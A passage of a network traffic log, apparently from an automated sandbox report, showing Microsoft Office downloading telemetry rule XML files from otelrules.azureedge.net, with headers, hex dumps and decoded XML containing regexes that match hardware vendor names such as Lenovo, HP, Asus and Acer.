                                                                                                                                                                2024-11-23 19:36:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:44 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 415
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193644Z-178bfbc474bpnd5vhC1NYC4vr400000004v000000000fk4b
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:44 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                32192.168.2.44978613.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:44 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:44 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 471
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                ETag: "0x8DC582BB10C598B"
                                                                                                                                                                x-ms-request-id: 8592a006-f01e-0085-6b6a-3c88ea000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193644Z-174c587ffdf4zw2thC1TEBu34000000003cg00000000ku68
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:44 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                33192.168.2.44978813.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:44 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:44 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:44 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 632
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                x-ms-request-id: dbeb181e-a01e-0050-28df-3ddb6e000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193644Z-15b8b599d885ffrhhC1TEBtuv000000003a000000000r2x0
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_MISS
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:44 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                34192.168.2.44978713.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:44 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:44 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 467
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                x-ms-request-id: ae573645-101e-008d-516d-3b92e5000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193644Z-174c587ffdfx984chC1TEB676g00000003cg0000000094wc
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:44 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                35192.168.2.44979013.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:46 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:46 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 486
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                ETag: "0x8DC582BB344914B"
                                                                                                                                                                x-ms-request-id: 3744ce68-601e-00ab-2603-3d66f4000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193646Z-178bfbc474bmqmgjhC1NYCy16c000000051g00000000477z
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:46 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                36192.168.2.44978913.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:46 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:46 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 407
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                x-ms-request-id: bddf9f2e-a01e-0002-120c-3d5074000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193646Z-178bfbc474bbbqrhhC1NYCvw74000000053g000000005rp0
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:46 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                37192.168.2.44979113.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:46 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:46 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 427
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                ETag: "0x8DC582BA310DA18"
                                                                                                                                                                x-ms-request-id: f440515e-401e-0029-2e38-3c9b43000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193646Z-178bfbc474bv587zhC1NYCny5w00000004rg00000000e3pd
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:46 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                38192.168.2.44979213.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:46 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:46 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:46 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 486
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                ETag: "0x8DC582B9018290B"
                                                                                                                                                                x-ms-request-id: aff2abcc-f01e-0003-4547-3c4453000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193646Z-178bfbc474bpscmfhC1NYCfc2c00000003m0000000001ck0
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:46 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                39192.168.2.44979313.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:46 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:46 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 407
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                ETag: "0x8DC582B9698189B"
                                                                                                                                                                x-ms-request-id: 5b0f4dfe-c01e-00a1-3715-3d7e4a000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193646Z-178bfbc474bp8mkvhC1NYCzqnn00000004rg00000000ba1s
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                40192.168.2.44979513.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:48 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:48 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 469
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                ETag: "0x8DC582BBA701121"
                                                                                                                                                                x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193648Z-174c587ffdfn4nhwhC1TEB2nbc00000003e000000000dref
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:48 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                41192.168.2.44979613.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:48 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:48 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 415
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
